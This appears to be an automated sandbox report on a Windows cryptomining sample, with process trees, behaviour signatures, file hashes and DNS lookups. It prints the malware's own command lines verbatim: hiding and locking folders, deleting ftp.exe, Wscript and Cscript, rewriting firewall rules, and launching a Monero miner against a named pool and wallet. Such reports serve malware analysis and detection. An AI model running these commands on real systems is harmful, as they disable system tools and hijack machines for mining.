PID 2868 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2576 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2576 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2576 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2576 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2576 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2576 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2724 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2724 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2724 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2724 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2724 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2724 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2864 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2864 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2864 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2864 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2864 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2864 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2616 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2616 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2616 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2616 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2616 wrote to memory of 2644 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2516 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2516 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2516 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2516 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2516 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2516 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2504 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2504 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2504 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2504 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2504 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2504 wrote to memory of 2648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 1240 wrote to memory of 2596 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2596 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2596 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2596 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2596 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2596 wrote to memory of 2476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1240 wrote to memory of 2500 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2500 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 1240 wrote to memory of 2500 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe
PID 2500 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2500 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2500 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1240 wrote to memory of 2304 N/A C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\Common Files\Microsoft Shared\jakbpcjd" /t /e /c /d administrator

C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe

"C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\0241FE~1.EXE > nul

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe

"C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe" -V -o xmr.crypto-pool.fr:443 -u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Windows\Fonts\banbecud"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Windows\Fonts\banbecud"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Windows\Fonts\banbecud" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Windows\Fonts\banbecud" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Windows\Fonts\banbecud\Wscntfy.exe

C:\Windows\Fonts\banbecud\Wscntfy.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto&cmd.exe /c netsh advfirewall set allprofiles state on&netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound&netsh advfirewall firewall delete rule name=all protocol=tcp localport=137&netsh advfirewall firewall delete rule name=all protocol=tcp localport=138&netsh advfirewall firewall delete rule name=all protocol=tcp localport=139&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445&netsh advfirewall firewall delete rule name=all protocol=udp localport=137&netsh advfirewall firewall delete rule name=all protocol=udp localport=138&netsh advfirewall firewall delete rule name=all protocol=udp localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80&netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic&exit&exit

C:\Windows\SysWOW64\net.exe

net start MpsSvc

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start MpsSvc

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c sc config MpsSvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config MpsSvc start= auto

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd /c wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value >"C:\Program Files\ls.txt"&exit

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value

Network

Country Destination Domain Proto
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp

Files

C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe

MD5 99d91a5ca408888ad0139ba017c263b0
SHA1 ee00c4cbb144833ea37557e09dab4d036cf491e3
SHA256 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
SHA512 8910a22fe0a3a660e22fb8c8220abe6df6356eea3c342614dddb658bef7bc5c200fe605abdbde0ba50a61fa0e5fef9aae9f2bd083dff0bcfd4a204ed043bc164

C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe

MD5 d5f810d2810eb4412a5920a677d1bef1
SHA1 5d518c9c5b1097708b80ff572501e195b381c30c
SHA256 33ca0835da8d32f6e187f8a6376720fdf5e417530df7039d01841787cf513d51
SHA512 b308b9b8ba9d801fe0d0906401263621c7a84113277202feaad50d1e832e3af80131c8794e26ad61ee4c6e62e8404b343493c2186076c9ef6d584fb8b8f09663

C:\Program Files\common files\system\wk.ini

MD5 a7b45e477cde8d6961abe2784a24cd1a
SHA1 3dd8ca9999258337da24e158d83c06bac3f546ee
SHA256 9bf4df16711b4f831cd9979af2d0b616c0530e5b1ba311b29a9b63e948248b4c
SHA512 a25e27c85c5693ce198d87cf8d5d4127635aa18d50f3b48232e3dc6bb98d451f6d6c7b6acce6d0f38ddef230efb098fd5279f601befd97f4ba33daf6f4183ec9

memory/2832-13-0x0000000000400000-0x0000000000498000-memory.dmp

memory/1240-12-0x0000000000A70000-0x0000000000B08000-memory.dmp

C:\Windows\Fonts\banbecud\Wscntfy.exe

MD5 6a45590b819f385305ef39c912c134e8
SHA1 7916b19ad989ecd1eff12a7de52668f674335f2f
SHA256 e3258f7c8e2be3a5eeaa697b80fc1b3cc64b84a933e551c802c7479b86768db4
SHA512 1849029c7e433f5681848f0c8945d565873b2ec7164f9db71abbd3f5b59e3ad83b03f0be62666d2fc77b409565207500a2d29b30ce0a43aa8a67e7e999dd3dad

C:\Program Files\common files\system\jk.ini

MD5 f895344ab3b578bd7b68364044e26d76
SHA1 bfa5f38963c424ad48b712b712627b0cc4c1055f
SHA256 8ea5212859cfd7eba7c691e3a115fffbabd8ad626629b6313ca3719952b0ef8a
SHA512 5a01cad8b4ff238b2657a2810cfc146c92fa787effa39295f9b24bfda50005db10c457a47aeb57fc2f8166a6513b6240c568c32f4199eb8a89082976349b2d84

memory/1752-17-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/2832-19-0x0000000000400000-0x0000000000498000-memory.dmp

memory/1752-21-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Program Files\ls.txt

MD5 ad15cdc0461479b82fd27d06568cb72f
SHA1 bdcd6c2fdd39858c304880e5d7c0dcb67ffc8745
SHA256 cbb873b0119c092380a2dc9ac9cfc0ec8c7f054c0b57f0fefe01151d9e1bc55d
SHA512 1742c58168c612f7e3631d7a0c5c821a2dfd9be52a1b4323089c5c8151c646b7d9c06dc015fd53bc4f426d6d18eb276b8d5575864501c6f856ff48b243f09745

memory/1752-33-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1752-39-0x0000000000400000-0x00000000004D3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-12 14:46

Reported

2024-10-12 14:49

Platform

win10v2004-20241007-en

Max time kernel

119s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File created \??\c:\windows\system32\drivers\etc\hosts_bak C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
File opened for modification \??\c:\windows\system32\drivers\etc\hosts_bak C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
File created \??\c:\windows\system32\drivers\etc\hosts C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Indicator Removal: File Deletion

defense_evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\eajbdcmd C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\wk.ini C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
File opened for modification C:\Program Files\common files\system\wk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\jk.ini C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
File opened for modification C:\Program Files\common files\system\jk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\ls.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
